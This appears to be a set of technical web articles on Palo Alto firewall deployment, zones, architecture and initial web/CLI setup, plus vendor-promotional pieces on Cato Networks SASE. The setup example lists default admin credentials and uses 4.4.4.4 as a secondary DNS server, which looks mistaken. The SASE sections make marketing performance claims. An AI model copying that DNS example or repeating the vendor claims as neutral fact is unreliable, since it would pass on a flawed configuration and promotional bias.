Layer 3 deployment mode is a popular deployment setup. In this mode the firewall routes traffic between multiple interfaces, each of which is configured with an IP address and security zone. The Firewall interfaces can also be configured to obtain their IP address via a DHCP server and can be used to manage the security appliance.

 Palo Alto Next Generation Firewall deployed in Layer 3 mode

Figure 4 – Palo Alto Next Generation Firewall deployed in Layer 3 mode

The diagram above shows a typical Layer 3 deployment setup where the Firewall routes and controls traffic between three different IP networks. Similar to other setup methods, all traffic traversing the Firewall is examined and allowed or blocked according to the security policies configured.

Summary

In this article we examined a few of the different deployment modes available for Palo Alto firewalls. We talked about Tap mode, Virtual Wire mode, Layer 2 and Layer 3 deployment modes. Each deployment method is used to satisfy different security requirements and allows flexible configuration options. Visit our Palo Alto Firewalls Section for more in-depth technical articles.


Palo Alto Firewalls Security Zones – Tap Zone, Virtual Wire, Layer 2 and Layer 3 Zones

Palo Alto Networks Next-Generation Firewalls rely on the concept of security zones in order to apply security policies. This means that access lists (firewall rules) are applied to zones and not interfaces – this is similar to Cisco’s Zone-Based Firewall supported by IOS routers.

Palo Alto Networks Next-Generation Firewall zones have no dependency on their physical location and may reside in any location within the enterprise network. This is also illustrated in the network security diagram below:

Palo Alto Firewall Security Zones can contain networks in different locations 

Figure 1. Palo Alto Firewall Security Zones can contain networks in different locations

The topology illustrated above shows VLANs 10, 11, 12 and 2 managed by a Cisco Catalyst 4507R+E switch; they are all part of OSPF Area 0 and visible as routes on the Palo Alto Firewall. A Layer 3 aggregated link has been created between the Palo Alto Firewall (interface ae1 on each firewall) and the Cisco 4507R+E switch (Port-Channel 1 & 2).

When aggregation interface ae1.2 on the Palo Alto Firewall is configured to be part of the DMZ Security Zone, all networks learnt by the OSPF routing protocol on interface ae1.2 will be part of the DMZ Security Zone.

Creating a Security Zone involves tasks such as naming the zone, assigning interfaces to the newly created zone and more. Palo Alto Networks Next-Generation Firewalls won’t process traffic from any interface unless it is part of a Security Zone.

The diagram below depicts the order in which packets are processed by the Palo Alto Firewall:

Initial Packet Processing – Flow Logic of Palo Alto Next-Generation Firewall

Figure 2. Initial Packet Processing – Flow Logic of Palo Alto Next-Generation Firewall

It is without doubt that zone-based firewalls provide greater flexibility in security design and are also considered easier to administer and maintain, especially in large-scale network deployments.

Palo Alto Networks Next-Generation Firewalls have four main types of zones, as shown in the screenshot below:

  • Tap Zone. Used in conjunction with SPAN/RSPAN to monitor traffic.
  • Virtual Wire. Also known as Transparent Firewall.
  • Layer 2. Used when switching between two or more networks.
  • Layer 3. Used when routing between two or more networks. Interfaces must be assigned an IP address.

Types of Security Zones in Palo Alto Firewalls 

Figure 3. Types of Security Zones in Palo Alto Firewalls

Palo Alto Networks Next-Generation Firewalls have a special zone called External, which is used to pass traffic between Virtual Systems (vsys) configured on the same firewall appliance. The External zone type is only available on Palo Alto Networks Next-Generation Firewalls capable of Virtual Systems, and the External zone is visible only when the multi-vsys feature is enabled.

Creating A Security Zone

This section focuses on creating the different types of Security Zones in Palo Alto Networks Next-Generation Firewalls.

Step 1. Login to the WebUI of Palo Alto Networks Next-Generation Firewall

Step 2. From the menu, click Network > Zones > Add

Creating a new Zone in a Palo Alto Firewall

Figure 4. Creating a new Zone in Palo Alto Firewall

Step 3. Provide the name for the new Zone, and select the zone type and click OK:

Creating a zone in a Palo Alto Firewall

Figure 5. Creating a zone in a Palo Alto Firewall

In a similar manner we can repeat steps 1 to 3 to create Tap, Virtual Wire or Layer 2 security zones.

Finally, it is important to note that zone names are case sensitive, so one needs to be careful, as the zones FiewallCX and firewallcx are considered different zones:

Identically named Security zones using different letter cases result in different Security zones

Figure 6. Identically named Security zones using different letter cases result in different Security zones

 Example of case sensitive security zones with identical zone names

Figure 7. Example of case sensitive security zones with identical zone names

Creating a security zone in Palo Alto Networks Next-Generation Firewalls involves three steps:

Step 1. Specify the Zone name

Step 2. Select the Zone type

Step 3. Assign the Interface
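For completeness, the same three steps map to a single PAN-OS CLI statement. The sketch below is indicative only; the zone name and interface are hypothetical, and the interface must already be configured as a Layer 3 interface:

> configure
# set zone DMZ network layer3 ethernet1/3
# commit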

The interfaces part will be dealt with in upcoming posts, as one needs to understand the types of interfaces Palo Alto Networks Next-Generation Firewalls offer and how they work.

In Palo Alto Networks Next-Generation Firewalls, zone names have no predefined meaning or policy associations; basically, they are created to group services by function. For example, one can group all Domain Controllers in one security zone even if they are part of different networks.

 Example of grouping Domain Controllers in same security zone – DMZ

Figure 8. Example of grouping Domain Controllers in same security zone – DMZ

As mentioned, Palo Alto Networks Next-Generation Firewalls work on the principle of Security zones: by default, intra-zone traffic is allowed and inter-zone traffic is denied. More technical articles can be found in our Palo Alto Networks Firewall section.


Palo Alto Firewall Application-based Policy Enforcement (App-ID), User Identification (User-ID) and Application Control Centre (ACC) Features for Enterprise Networks

Our previous article examined the benefits of the Palo Alto Networks Firewall Single Pass Parallel Processing (SP3) architecture and how it combines with the separate Data and Control planes to boost firewall performance and handle large amounts of traffic without any performance impact. This article focuses on the traffic flow logic inside the Palo Alto Firewall and two unique features that separate it from the competition: Application-based policy enforcement (App-ID) and User Identification (User-ID).

For more Technical articles on Palo Alto Networks Firewalls, visit our Palo Alto Networks Firewall Section.

Flow Logic Of The Next-Generation Firewall

The diagram below is a simplified version of the flow logic of a packet travelling through a Palo Alto Networks Next-Generation Firewall and can always be used as a reference when studying the packet processing sequence:

palo-alto-firewall-app-id-user-id-application-control-centre-1

Figure 1. Flow Logic of a packet inside the Palo Alto Networks Next Generation Firewall

Palo Alto Networks Next-Generation Firewalls work with the concept of zones, not interfaces. Once a packet enters the firewall, the Palo Alto Networks Next-Generation Firewall identifies which zone the packet came from and where it is destined to go. This is similar to Cisco IOS Router Zone-Based Firewalls and Cisco ASA Firewalls.

Interested users can also download for free the Palo Alto Networks document “Day in the Life of a Packet”, found in our Palo Alto Networks Download section, which explains in great detail the packet flow sequence inside the Palo Alto Networks Firewall.

App-ID & User-ID – Features That Set Palo Alto Apart From The Competition

App-ID and User-ID are two really interesting features not found on most competitors’ firewalls and really help set Palo Alto Networks apart from the competition. Let’s take a look at what App-ID and User-ID are and how they help protect the enterprise network.

App-ID: Application-based Policy Enforcement

App-ID is the biggest asset of Palo Alto Networks Next-Generation Firewalls. Traditional firewalls block traffic based on protocol and/or ports, which years ago seemed to be the best way of securing the network perimeter; however, this approach is inadequate today, as applications (including SSL VPNs) can easily bypass a port-based firewall by hopping between ports or using well-known open ports such as tcp-http (80) or tcp/udp-dns (53), which are normally found open.

A traditional firewall that allows the use of TCP/UDP port 53 for DNS lookups will allow any application using that port to pass through without further questions. This means that any application can use port 53 to send and receive traffic, including evasive applications like BitTorrent for P2P file sharing, which is quite dangerous:

Palo Alto Network’s App-ID effectively blocks unwanted BitTorrent traffic

Figure 2. Palo Alto Network’s App-ID effectively blocks unwanted BitTorrent traffic

With App-ID, Palo Alto Networks Next-Generation Firewalls use multiple identification mechanisms to determine the exact identity of applications traversing the network. Following is the order in which traffic is examined and classified:

  1. Traffic is classified based on the IP Address and port
  2. Signatures are then applied to the allowed traffic to identify the application based on unique application properties and related transaction characteristics.
  3. For evasive applications which cannot be identified through advanced signature and protocol analysis, Palo Alto Networks Next-Generation Firewalls apply heuristics or behavioural analysis to determine the identity of the application.

Using the above process, Palo Alto Networks Next-Generation Firewalls are very successful in identifying DNS traffic not only at the port level but also at the application level, making it extremely difficult for an evasive application like BitTorrent to use any open port and pass through the firewall undetected.

User Identification (User-ID)

User-ID is one more key determining factor that places Palo Alto Networks Next-Generation Firewalls apart from the competition.

Traditionally, security policies and rules were applied based on IP addresses. However, these days both users and applications have a dynamic nature, which means that IP addresses alone have become insufficient for monitoring and controlling user activity. A single user might access the network from multiple devices (laptops, tablets, smartphones, servers).

Thanks to the User-ID feature of Palo Alto Networks Next-Generation Firewalls, administrators are able to configure and enforce firewall policies based on users and user groups instead of network zones and addresses.

The Palo Alto Networks Next-Generation Firewall can communicate with many directory servers, such as Microsoft Active Directory, eDirectory, SunOne, OpenLDAP, and most other LDAP-based directory servers to provide user and group information to the firewall. With this powerful feature, large organizations are able to create security policies that are user or group based, without worrying about IP addresses associated to them.

Threat Prevention

Palo Alto Networks Next-Generation Firewalls are very effective in preventing threats, offering real-time threat prevention from viruses, worms, spyware and other malicious traffic, which can be varied by application and traffic source.

Application Command Center (ACC)

Palo Alto Networks Next-Generation Firewalls offer the most interactive graphical summary of the applications, URLs, users, threats and content traversing the network. The ACC makes use of the firewall logs to provide visibility of traffic patterns, information on threats, user activity, rule usage and much more in an interactive graphical form:

Figure 3. Palo Alto Application Command Center provides maximum visibility on network traffic

Summary

This article examined why Palo Alto Networks Next-Generation Firewalls are unique in many respects. Features such as App-ID and User-ID allow in-depth control of applications and users, making it possible to fully manage small to very large enterprises without a problem. The Application Command Center (ACC) gives the administrator a complete view of the applications and services accessing the internet, alongside some very useful statistics. To discover more in-depth technical articles on Palo Alto Networks Firewalls, please visit our Palo Alto Networks Firewall section.


The Benefits of Palo Alto Networks Firewall Single Pass Parallel Processing (SP3) and Hardware Architecture

What makes the Palo Alto Networks Next-Generation Firewall (NGFW) so different from its competitors is its platform, process and architecture. Palo Alto Networks delivers all the next-generation firewall features using a single platform, parallel processing and a single management system, unlike other vendors who use different modules or multiple management systems to offer NGFW features.

More technical and how-to articles covering Palo Alto's Firewalls can be found in our Palo Alto Networks Firewall Section

Palo Alto Networks Next-Generation Firewall’s main strength is its Single Pass Parallel Processing (SP3) Architecture, which comprises two key components:

  1. Single Pass Software
  2. Parallel Processing Hardware

palo-alto-firewall-single-pass-parallel-processing-hardware-architecture-1

Figure 1.   Palo Alto Networks Firewall Single Pass Parallel Processing Architecture

Single Pass Software

The Palo Alto Networks Next-Generation Firewall is empowered with Single Pass software, which processes the packet to perform functions like networking, user identification (User-ID), policy lookup, traffic classification with application identification (App-ID), decoding, and signature matching for identifying threats and content, all of which are performed once per packet, as shown in the illustration below:

palo-alto-firewall-single-pass-parallel-processing-hardware-architecture-2

Figure 2: Palo Alto Networks Firewall - Single-Pass Architecture Traffic Flow

This processing of a packet in one go, or single pass, by the Palo Alto Networks Next-Generation Firewall enormously reduces processing overhead. Other vendors' firewalls, which use a different type of architecture, produce significantly higher overhead when processing packets traversing the firewall. It has been observed that Unified Threat Management (UTM) devices, which process traffic using a multi-pass architecture, suffer from processing overhead, added latency and throughput degradation.

The diagram below illustrates the multi-pass architecture used by other vendors' firewalls, clearly showing the differences from the Palo Alto Networks Firewall architecture and how the processing overhead is produced:

palo-alto-firewall-single-pass-parallel-processing-hardware-architecture-3

Figure 3: Traffic Flow for multi-pass architecture resulting in additional overhead processing

The Palo Alto Networks Next-Generation Firewall's Single Pass software scans the content within the same stream and uses uniform signature matching patterns to detect and block threats. By adopting this methodology, the Palo Alto Networks Next-Generation Firewall negates the need for separate scan engines and signature sets, which results in low latency and high throughput.

Parallel Processing Hardware

Palo Alto Networks Parallel Processing hardware ensures function-specific processing is done in parallel at the hardware level which, in combination with the dedicated Data plane and Control plane, produces stunning performance results. By separating the Data plane and Control plane, Palo Alto Networks is ensuring heavy utilization of either plane will not impact the overall performance of the Platform. At the same time, this means there is no dependency on either plane as each has its own CPU and RAM as illustrated in the diagram below:

palo-alto-firewall-single-pass-parallel-processing-hardware-architecture-4

Figure 4: Palo Alto Networks Firewall Hardware Architecture – Separation of Data Plane and Control Plane

The Control Plane is responsible for tasks such as management and configuration of the Palo Alto Networks Next-Generation Firewall, and it takes care of logging and reporting functions.

Palo Alto Networks Next-Generation Firewall offers processors dedicated to specific functions that work in parallel. The Data Plane in the high-end models contains three types of processors (CPUs) connected by high-speed 1Gbps busses.

The three types of processors are:

  1. Security Matching Processor: Dedicated processor that performs vulnerability and virus detection.
  2. Security Processor: Dedicated processor that performs hardware acceleration and handles security tasks such as SSL decryption, IPsec decryption and similar tasks.
  3. Network Processor: Dedicated processor responsible for network functions such as routing, NAT, QOS, route lookup, MAC Lookup and network layer communications.

Summary

Palo Alto Networks' unique architecture and design have played a significant role in helping place it apart from the rest of its competitors. Its Single Pass Parallel Processing architecture, coupled with the single management system, results in a fast and highly sophisticated Next-Generation Firewall that won't be left behind anytime soon. For more technical information and articles covering configuration and technical features of the Palo Alto Networks Firewall, visit our Palo Alto Networks Firewall Section.


Palo Alto Networks Firewall - Web & CLI Initial Configuration, Gateway IP, Management Services & Interface, DNS – NTP Setup, Accounts, Passwords, Firewall Registration & License Activation

This article is the second part of our Palo Alto Networks Firewall technical article series. Our previous article was an introduction to Palo Alto Networks Firewall appliances and their technical specifications, while this article covers basic IP management interface configuration, DNS, NTP and other services, plus admin account password modification and appliance registration and activation.

The introduction of Next-Generation Firewalls has changed the dimension of firewall management and configuration; most of the well-known firewall vendors have performed a major revamp, be it of the traditional command line mode or the GUI mode.

Palo Alto Networks is no different to many of those vendors, yet it is unique in terms of its WebUI. It’s a whole new experience when you access the WebUI of Palo Alto Networks Next-Generation Firewalls.

In order to start implementing Palo Alto Networks Next-Generation Firewalls, one first needs to configure them. Palo Alto Networks Next-Generation Firewalls can be accessed via either an out-of-band management port labelled MGT or a Serial Console port (similar to Cisco devices). By using the MGT port, one can separate the management functions of the firewall from the data processing functions. All initial configuration must be performed either on the out-of-band management interface or by using the serial console port. The serial port has default values of 9600-N-1 and a standard rollover cable can be used to connect to it.


Figure 1.   Palo Alto Networks Firewall PA-5020 Management & Console Port

By default, Palo Alto Networks Next-Generation Firewalls use the MGT port to retrieve license information and update threat and application signatures, so it is imperative that the MGT port has proper DNS settings configured and is able to access the internet.

Note: The instructions below apply to all Palo Alto Firewall models!

To access the Palo Alto Networks Firewall for the first time through the MGT port, connect a laptop to the MGT port using a straight-through Ethernet cable. By default, the web GUI is accessed using the following IP address and login credentials (note they are in lower case):

  • MGT Port IP Address: 192.168.1.1 /24
  • Username: admin
  • Password: admin

For security reasons it’s always recommended to change the default admin credentials. Until the default password is changed, the Palo Alto Networks Firewall alerts the administrator to change it every time they log in, as shown in the screenshot below:


Figure 2. Palo Alto Networks Firewall alerts the administrator to change the default password

Performing The Initial Setup On A Palo Alto Networks Firewall: Checklist

Below is a list of the most important initial setup tasks that should be performed on a Palo Alto Networks Firewall regardless of the model:

  • Change the default login credentials
  • Configure the management IP Address & managed services (https, ssh, icmp etc)
  • Configure DNS & NTP Settings
  • Register and Activate the Palo Alto Networks Firewall

Let’s take a look at each step in greater detail.

Change The Default Login Credentials

Step 1: Establish connectivity with the Palo Alto Networks Firewall by connecting an Ethernet cable between the MGT port and the laptop’s Ethernet interface.

Step 2: Configure the laptop Ethernet interface with an IP address within the 192.168.1.0/24 network. Keep in mind that we’ll find the Palo Alto Networks Firewall at 192.168.1.1 so this IP must not be used.
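The laptop address can also be set from the command line. The commands below are a minimal sketch; the interface names ("Ethernet" on Windows, eth0 on Linux) and the 192.168.1.50 address are assumptions, so adjust them to match your setup:

C:\> netsh interface ipv4 set address name="Ethernet" static 192.168.1.50 255.255.255.0

$ sudo ip addr add 192.168.1.50/24 dev eth0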

Step 3: Open a web browser and navigate to the URL https://192.168.1.1 – Take note that this is an HTTPS site. At this point the Palo Alto Networks Firewall login page appears.

Step 4: Enter admin for both name and password fields.

Step 5: From the main menu, click Device > Administrators > admin

  • Type the old password in the Old Password field
  • Type the new password in the New Password field
  • Type the new password in the Confirm New Password field
  • Click OK
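The default admin password can also be changed from the PAN-OS CLI. The commands below are a minimal sketch; the hostname and the interactive prompts are indicative only and may differ slightly between PAN-OS versions:

admin@PA-3050> configure
admin@PA-3050# set mgt-config users admin password
Enter password   :
Confirm password :
admin@PA-3050# commit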

Configure The Management IP Address & Management Services (HTTPS, SSH, ICMP)

At this point we have connectivity to the Palo Alto Networks Firewall and need to change the management IP address:

Step 1: Log on to the Palo Alto Networks Firewall using the new credentials entered in the previous section.

Step 2: From the web interface click Device > Setup > Management and select the Management Interface Settings radio button as shown below:


Figure 3. Accessing the Palo Alto Networks Firewall Management IP Address tab

Next, change the IP Address accordingly and enable or disable any management services as required. HTTPS, SSH and Ping (ICMP) are enabled by default. When ready, click OK:


Figure 4. Changing the Management IP Address & services on the Palo Alto Networks Firewall

Step 3: Now click Commit in the top right corner to save and commit the changes to the new configuration.
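The same management services can also be enabled or disabled from the PAN-OS CLI. The example below is a hedged sketch that disables Telnet and HTTP under set deviceconfig system service; verify the available options against your PAN-OS version before relying on them:

admin@PA-3050# set deviceconfig system service disable-telnet yes disable-http yes
admin@PA-3050# commit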

Configure DNS & NTP Settings In Palo Alto Networks

This section assumes all previous steps have been completed and we are currently logged into the Palo Alto Networks Firewall web interface.

Step 1: From the menu, click Device > Setup > Services and configure the DNS Servers as required. When ready, click on OK:


Figure 5. Configuring DNS Settings on Palo Alto Networks firewall

Step 2: Click on the Commit button on the top right corner to commit the new changes.

Configure Management IP Address, Default Gateway, DNS & NTP Settings Via CLI (PAN-OS)

Similar to Cisco devices, Palo Alto Networks devices can be configured via the web or CLI interface. While the CLI tends to be slightly more challenging, it provides complete control of configuration options and extensive debugging capabilities.

This section shows how to configure your Palo Alto Networks firewall using the console port. The computer’s serial port must have the following settings to correctly connect and display data via the console port: 9600 baud, 8 data bits, no parity, 1 stop bit and no flow control (9600-8-N-1).

Step 1: Login to the device using the default credentials (admin / admin).

Step 2: Enter configuration mode by typing configure:

admin@PA-3050> configure

Step 3: Configure the IP address, subnet mask, default gateway and DNS servers using the following PAN-OS CLI command in one line:

admin@PA-3050# set deviceconfig system ip-address 192.168.1.10 netmask 255.255.255.0 default-gateway 192.168.1.1 dns-setting servers primary 8.8.8.8 secondary 4.4.4.4

Step 4: Commit changes

admin@PA-3050# commit
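Although the heading of this section mentions NTP, the one-line command above covers only the IP, gateway and DNS settings. NTP servers can be added with a similar pair of commands; the syntax below is a sketch based on recent PAN-OS releases and the server names are examples only:

admin@PA-3050# set deviceconfig system ntp-servers primary-ntp-server ntp-server-address 0.pool.ntp.org
admin@PA-3050# set deviceconfig system ntp-servers secondary-ntp-server ntp-server-address 1.pool.ntp.org
admin@PA-3050# commit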

Registering & Activating Palo Alto Networks Firewall

This section assumes all previous steps have been completed and we are currently logged into the Palo Alto Networks Firewall web interface.

Step 1: Click Dashboard and look for the serial information in the General Information widget.

If the widget is not added, click on Widgets > Systems > General Information:


Figure 6. Adding Widgets to the Palo Alto Networks Firewall Web Interface

Step 2: Create a support account with Palo Alto Support.

Registering your Palo Alto Networks device is essential so you can receive product updates, firmware upgrades, support and much more.

First we need to create an account at https://support.paloaltonetworks.com and then proceed with the registration of our Palo Alto Networks Firewall device, during which we’ll need to provide the sales order number or customer ID, serial number of the device or authorization code provided by our Palo Alto Networks Authorized partner.

Further details about registration and activation process can be found in our article How to Register a Palo Alto Firewall and Activate Support, Subscription Services & Licenses. Covers All Models. 

Step 3: Activate the license by clicking Device > License and select Activate feature using authorization code:


Figure 7. Activating the Palo Alto Networks Firewall license

When prompted, enter the Authorization Code and then click OK.

Finally, verify that the license was successfully activated.
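Verification can also be performed from the PAN-OS CLI. The operational commands below are a sketch of the typical workflow: request license fetch retrieves licenses for a registered device with internet access, while request license info lists the installed licenses. The exact output varies by platform and subscriptions:

admin@PA-3050> request license fetch
admin@PA-3050> request license info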

Once the Palo Alto Networks Firewall is activated, it is ready for configuration according to our business’s needs.

This article showed how to configure your Palo Alto Networks Firewall via the web interface and the Command Line Interface (CLI). We covered configuring the management interface, enabling/disabling management services (HTTPS, SSH, etc.), configuring DNS and NTP settings, and registering and activating the Palo Alto Networks Firewall. For more in-depth technical articles make sure to visit our Palo Alto Networks Firewall section.


Introduction to Palo Alto Next-Generation Network Firewalls

During the past decade, we’ve seen the global IT security market flooded with new network security and firewall appliances. New vendors keep emerging into the market, while existing well-known vendors introduce new, smarter and more complex firewalls that aim to keep enterprise organizations as safe as possible. Palo Alto Networks is one of the new-generation security vendors who have managed to break into a saturated market and make their stand.

It’s no coincidence that Palo Alto Networks is considered to be a leader and pioneer when it comes to Next Generation Firewall appliances and Gartner seems to agree with this statement based on their Magic Quadrant report in the Next Generation Firewall Segment:


Figure 1. Gartner Magic Quadrant for Enterprise Network Firewalls

The Palo Alto Networks Next-Generation Firewalls’ unique way of processing packets using the Single Pass Parallel Processing (SP3) engine makes them a clear leader.

Note: Read all our technical articles covering Palo Alto Firewalls by visiting our Palo Alto Firewall Section.

Basically, the SP3 engine utilizes the same stream-based signature format to process protection features such as Anti-Virus, Anti-Spyware, Vulnerability Protection and Data Filtering. By doing so the firewall saves valuable processing power, unlike other Unified Threat Management (UTM) appliances which serially process each security feature offered, often introducing latency to the network traffic.

Advanced security features like App-ID, User-ID and Content-ID, along with Security Profiles comprising features like Antivirus, Anti-Spyware, Vulnerability Protection, URL Filtering, DoS Protection and Data Filtering, make Palo Alto the leader. Most importantly, its malware analysis solution, WildFire, offers advanced protection from unknown threats.

Palo Alto Networks offers its firewalls as Hardware Platforms and Virtual Platforms. Its Hardware Platforms come in different flavors.


Figure 2. The Palo Alto Firewall family

PA-200 and PA-500 Series Firewalls are meant for small businesses and come with very limited throughput; they do not support Virtual Systems. Virtual Systems, also known as VSYS, are used to create virtual firewall instances in a single pair of Palo Alto Firewalls; in other words, Virtual Systems can be compared to contexts in Cisco ASA Firewalls or VDOMs in Fortinet firewalls. The PA-200 and PA-500 Series Firewalls also support only a very limited number of security policies, such as security rules, NAT rules, policy-based forwarding rules and a few more.

Datasheets on Palo Alto Firewall appliances and Virtual Servers are available at our Palo Alto Datasheets and Guides download area

The table below provides a clear comparison of features and technical specifications of both PA-500 and PA-200 firewall models:

Continue reading


The Need for a Converged SASE Platform. Converging Network & Security Services with Catonetworks SASE Platform

The digital transformation is pushing applications to the cloud, the 2020-2022 pandemic shifted employees to work from home, and the number of resulting new use cases is sending IT leaders scrambling for answers. The number of solutions IT departments have had to adopt to ensure their network's performance and security has continuously grown for over a decade.

The recent trends have greatly accelerated this process. When looking into ways to help mitigate this complexity, one of the leading conclusions is that enterprises should find ways to consolidate their separate, stand-alone products into a unified solution which can be more easily managed and maintained, and which can provide them with a consistent and holistic view of all traffic in their network.

Gartner has gone a step further and designed a framework that facilitates this, which they named the Secure Access Service Edge (SASE). SASE is, in essence, an architecture that converges networking and security capabilities into a single solution and goes a long way in reducing network complexity.


Before we talk about the networking and security services that SASE converges, let's first look at the entities and traffic flows they need to serve.

The journey starts at any of the enterprise's endpoints which need to access any of the enterprise's assets or external resources. The origin endpoints are typically users who can connect from any of the enterprise's physical locations or remotely. Physical locations are typically enterprise headquarters or branch offices, which connect between themselves or to other enterprise locations such as physical or cloud-based datacenters. Enterprises typically use an MPLS and/or SD-WAN product to connect their physical locations:


Traditional MPLS VPN Network

Mobile and remote users will use a remote access solution to connect to their networks. Cloud-based services such as AWS and Azure will require virtual connectors or other secure tunnel solutions to connect to the enterprise network, while remote offices use a private managed MPLS service to connect to the headquarters.

As we can see, a modern digital enterprise needs to connect various types of endpoints that are spread across multiple locations.

So how is it possible to converge network and security services for such a dispersed network topology?

The only real option, as Gartner stated, is to use a cloud service to which all network endpoints can connect and which is capable of delivering all required services. This is precisely what Cato's SASE Cloud platform offers:


SASE Architecture Example

Continue reading


Key Features of a True Cloud-Native SASE Service. Setting the Right Expectations

Secure Access Service Edge (SASE) is an architecture widely regarded as the future of enterprise networking and security. In previous articles we talked about the benefits of a converged, cloud-delivered, SASE service which can deliver necessary networking and security services to all enterprise edges. But what does "cloud delivered" mean exactly? And are all cloud services the same?

We’ll be covering the above and more in this article:


Defining Cloud-Native Services

While we all use cloud services daily for both work and personal benefit, we typically don't give much thought to what actually goes on in the elusive place we fondly call "the cloud". For most people, "the cloud" simply means they are using someone else’s computer. For most cloud services, this definition is good enough, as we don't need to know, nor care, about what they do behind the scenes.

For cloud services delivering enterprise networking and security services, however, this matters a lot. The difference between a true cloud-native architecture and software simply deployed in a cloud environment can have a detrimental impact on the availability, stability, performance, and security of your enterprise.

Let's take a look at what cloud-native means, and the importance it plays in our network.

Continue reading


Converged SASE Backbone – How Leading SASE Provider, Cato Networks, Reduced Jitter/Latency and Packet Loss by a Factor of 13!

Global connectivity is top of mind for many IT teams at organizations of all sizes. We are currently in the middle of a dramatic shift in business and technology practice, as users are becoming more mobile while applications are being transitioned to the cloud. This shift will only accelerate as companies will look to leverage the speed and agility of cloud services with the operational, cost and quality advantages of a geographically distributed work force. While Covid-19 has contributed to the acceleration of this shift, the change was always inevitable once technology was ready. Legacy connectivity and security products have long been a barrier to progress.


SASE is the Answer

With uncanny timing, Gartner introduced the Secure Access Service Edge, or SASE, near the end of 2019, just before the Covid-19 virus started to gain global traction. SASE represents the shift away from castle-and-moat security with resources siloed into just a few corporate datacenters. After all, if organizations are consuming collaboration and productivity tools from the cloud, why not security and connectivity too?

While there is much buzz around SASE with security and networking vendors, and some debate over what products and services fit the SASE moniker, the intention is simple: leveraging economies of scale, organizations should purchase SASE as a cloud delivered service with global presence that brings security closer to the user. The user can be remote, mobile or in a corporate owned facility, regardless of physical location, the user’s access and security posture should remain consistent.

Figure 1: Cato PoP Map

At Cato Networks we built the first SASE solution, starting way back in 2015. We’ve grown to 70+ Points-of-Presence (PoPs) globally that fully converge networking and security into a single platform. With our experience, we believe that a global private backbone is an essential component of a true SASE solution. If we consider that the goal is consistent access and security with reduced cost and complexity, we must recognize that the ability of a user to access resources applies not just to access controls and services, but also to the usability and reliability of that user’s access. Essentially, users must have predictable performance to be productive.

A Converged Private Backbone is Essential

Reliability and predictability of connectivity isn’t a new concept or focus area for technical teams. Organizations have been using MPLS and other methods to achieve this for years. But MPLS is expensive, resulting in reliable, low bandwidth links to just a few places. Don’t forget that this approach completely neglected remote users who traditionally have had to VPN across the public Internet to reach datacenter security and resources.

Fast forwarding to today, most SASE vendors position their services as a way to reduce or eliminate MPLS, but completely ignore the unpredictability of the public Internet. Cato’s service was architected with this in mind, and we connected our PoPs with a global private backbone of multiple tier 1 providers. Our customers’ packets aren’t taking the cheapest possible route across tier 3 providers, instead taking the most efficient route to the destination. Combined with our WAN optimization capabilities, Cato ensures reliable, predictable performance for all users and locations.

Figure 2: Cato Network Rules

The easiest way to see if a SASE vendor has a converged private backbone is to look at their management console. Your vendor should enable you to make granular Internet & WAN rules to manage the handling and routing of your traffic. In addition to priority level, you should be able to control egress PoP location, even egressing your traffic from dedicated private IP addresses, and enabling things like TCP optimization and packet loss mitigation.  

Figure 3: Network Rule Criteria

 

Figure 4: Network Rule Actions

Having the ability to configure these policies directly in the management interface demonstrates that the backbone is a converged component of the solution. You should not have to open tickets and wait for routing policies to be created on your behalf; instead, you should have direct control with the ability to deploy or modify policies in real-time.

Controlling egress location allows you to maximize your utilization of Cato’s global private backbone, egressing your traffic as close to the destination as possible. The ability to use dedicated private IP addresses means that you can use source-IP anchoring policies for SaaS application security, without having to backhaul your traffic anywhere.

The ability to create and manage your WAN and Internet traffic with policies is key, but also essential is understanding how these policies are impacting your traffic and real-time visibility into performance. Cato allows you real-time views into performance, priority level and application usage. These insights are invaluable in ensuring your policies are meeting your organization’s needs or evaluating potential changes that may be required.

Figure 5: Traffic Priority Analyzer

The Proof is in the Packets – Testing a Converged SASE Solution

To demonstrate the real-world implications of a converged SASE solution with a global private backbone, we ran PingPlotter to a server in China over a 48-hour period using both the public Internet and Cato’s backbone. Connectivity into China is usually complex due to regulation and the Great Firewall, but Cato’s PoP network can easily enable organizations access into and out of China (Cato has 3 PoPs in China and a government-approved link to Hong Kong).

As you can see below, the results speak for themselves. When utilizing Cato’s backbone, we had only 20ms of Jitter, down from 260ms on the public Internet. We also had much less packet loss with our connection being far more reliable and consistent. You can just imagine the difference in user experience when using file sharing, VOIP or collaboration tools:

Figure 6: PingPlotter Tests

Summary

The promise of SASE is to bring security and connectivity to all edges with less cost and complexity. To do this effectively, a SASE vendor must have a global private backbone. At Cato, we built our SASE cloud from the ground up, fully converging networking and security into a single platform delivered from 70+ global PoPs that are connected by a private backbone composed of multiple Tier 1 providers. Cato allows you to quickly connect and secure users and locations at global scale with ease.

More information on SD-WAN and SASE can be found in our dedicated SASE and SD-WAN section.


Configuring A SASE Unified Network: Data centers, Remote Sites, VPN Users, and more

This article explores the need for Secure Access Service Edge (SASE) in today’s organizations. We show how one of the most advanced SASE platforms available combines VPN and SD-WAN capabilities with cloud-native security functions to quickly and securely connect on-premises data centers, cloud data centers, branch offices, and remote users.

Before we dive any further, let’s take a look at what’s covered:


SASE: The Architecture for a Secure Cloud and Mobile World

IT and security managers are constantly concerned by the different entities which connect to their networks. Keeping track of who is connecting, using which edge device type, what they’re connecting to, and which permissions they should have can be a messy and dangerous business.  

An enterprise’s network is composed of several types of edges. An edge can be any location or endpoint which needs to connect to any other resource or service available inside or outside the network. This includes the enterprise’s on-premises headquarters, branch offices, data centers, mobile users connecting remotely (e.g. their home), public cloud data centers (e.g. AWS and Azure), 3rd party SaaS applications (e.g. Office365 and Salesforce), and virtually any website across the WWW.

To enable connectivity and secure access for all edges, enterprises are forced to adopt different solutions to manage different edge types: for example, VPNs for remote users, on-prem Next-Generation Firewalls (NGFWs) for the physical locations, cloud-based NGFWs for cloud-based applications, Cloud Access Security Brokers (CASB) for SaaS and Secure Web Gateways (SWG) for web access. This large number of different products introduces unwanted complexity, inefficiency, and potential security loopholes to enterprises. But perhaps there is a better way to enable secure access to any service from any edge? In fact, there is, and it’s called, surprisingly enough, Secure Access Service Edge (SASE).


Cloud-based SASE Traffic Analysis Dashboard

Defining SASE

SASE is a new architecture that converges networking and security into a holistic, unified cloud service. It is a concept defined by Gartner in late 2019 to simplify enterprise networking and security. At the heart of the SASE premise lies the understanding that networking and security cannot be addressed separately, using different products and services. The inter-dependency between the two is fundamental, and their convergence is critical for addressing the needs of the modern digital enterprise.

Click here to learn more about SASE and how it differs from SD-WAN.

The Four Pillars of SASE Architecture:

Four main principles lie at the heart of the SASE architecture:

